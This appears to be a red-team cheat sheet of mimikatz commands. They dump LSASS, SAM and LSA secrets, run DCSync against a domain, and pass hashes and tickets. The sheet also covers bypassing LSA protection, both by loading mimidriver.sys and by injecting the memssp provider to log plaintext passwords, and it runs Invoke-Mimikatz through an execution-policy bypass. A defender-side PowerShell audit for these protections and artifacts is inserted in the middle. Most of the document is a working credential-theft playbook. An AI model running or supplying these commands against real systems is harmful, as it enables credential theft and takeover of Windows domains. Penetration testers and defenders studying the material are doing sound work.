mimikatz

```
#The commands are in Cobalt Strike format!

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available Kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS to a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES keys
mimikatz sekurlsa::ekeys

#Dump SAM database
mimikatz lsadump::sam

#Dump SECRETS database
mimikatz lsadump::secrets

#Inject into LSASS and dump the Domain Controller's credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the domain's credentials remotely, without touching the DC's LSASS
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#Dump a user's old passwords and NTLM hashes
mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history

#List and dump local Kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list
```

❗ What if mimikatz fails to dump credentials because of LSA Protection controls?

- LSA as a Protected Process (Kernel Land Bypass)

  ```
  #Check if LSA runs as a protected process by looking at whether the "RunAsPPL" value is set to 0x1
  reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa

  #Next, upload mimidriver.sys from the official mimikatz repo to the same folder as your mimikatz.exe
  #Now let's load mimidriver.sys into the system
  mimikatz # !+

  #Now let's remove the protection flags from the lsass.exe process
  mimikatz # !processprotect /process:lsass.exe /remove

  #Finally, run the logonpasswords function to dump lsass
  mimikatz # sekurlsa::logonpasswords
  ```

- LSA as a Protected Process (Userland "Fileless" Bypass)

- LSA is running as a virtualized process (LSAISO) by Credential Guard

  ```
  #Check if a process called lsaiso.exe exists among the running processes
  tasklist | findstr lsaiso

  #If it does, there isn't a way to dump lsass; we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
  #Let's inject our own malicious Security Support Provider into memory; for this example I'll use the one mimikatz provides
  mimikatz # misc::memssp

  #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
  ```
    
- [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821)
- [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a)
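As an added defender-side check (not code from the mimikatz project or the original cheat sheet), the following PowerShell audit reports the state of the two controls discussed above (RunAsPPL and LsaIso/Credential Guard) and looks for the artifacts this page names, mimidriver.sys and mimilsa.log. It assumes the Win32_DeviceGuard CIM class lists 1 in SecurityServicesRunning when Credential Guard is active.

```powershell
# Added defender-side audit (not from the mimikatz project or the original cheat sheet).
# Read-only; run from an elevated PowerShell session.
function Get-LsaProtectionState {
    # RunAsPPL: registry path and value name as quoted in the cheat sheet.
    # A nonzero value means LSA runs as a protected process (the sheet checks for 0x1).
    $lsaKey   = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $runAsPpl = (Get-ItemProperty -Path $lsaKey -Name RunAsPPL -ErrorAction SilentlyContinue).RunAsPPL

    # Credential Guard: LsaIso.exe is the isolated LSA process the sheet tells you to look for.
    # Assumption: Win32_DeviceGuard lists 1 in SecurityServicesRunning when Credential Guard is active.
    $lsaIso = Get-Process -Name lsaiso -ErrorAction SilentlyContinue
    $dg     = Get-CimInstance -Namespace 'root\Microsoft\Windows\DeviceGuard' `
                              -ClassName Win32_DeviceGuard -ErrorAction SilentlyContinue
    $cgOn   = ($null -ne $dg) -and (@($dg.SecurityServicesRunning) -contains 1)

    # Artifacts of the two bypasses described above: the mimidriver.sys kernel driver
    # (used to strip PPL from lsass) and mimilsa.log (written by the memssp SSP).
    $driver = Get-CimInstance -ClassName Win32_SystemDriver -ErrorAction SilentlyContinue |
              Where-Object { $_.PathName -like '*mimidriver*' }
    $sspLog = Test-Path -Path (Join-Path $env:SystemRoot 'System32\mimilsa.log')

    [PSCustomObject]@{
        RunAsPPL          = $runAsPpl
        LsaProtected      = (($null -ne $runAsPpl) -and ($runAsPpl -ne 0))
        LsaIsoRunning     = ($null -ne $lsaIso)
        CredentialGuard   = $cgOn
        MimidriverLoaded  = ($null -ne $driver)
        MimilsaLogPresent = $sspLog
    }
}

$state = Get-LsaProtectionState
$state | Format-List

# Flag hosts that are exposed (no PPL and no Credential Guard) or that already show bypass artifacts.
if (-not $state.LsaProtected -and -not $state.CredentialGuard) {
    Write-Warning 'lsass.exe is not protected: enable RunAsPPL or Credential Guard.'
}
if ($state.MimidriverLoaded -or $state.MimilsaLogPresent) {
    Write-Warning 'mimikatz LSA-bypass artifacts found: treat this host as compromised.'
}
```

Note that RunAsPPL only takes effect after a reboot, so a value of 1 in the registry alone does not prove lsass is currently protected; pair it with an EDR or Sysmon view of access to lsass.exe for detection.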

## Mimikatz powershell

```powershell
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"'
```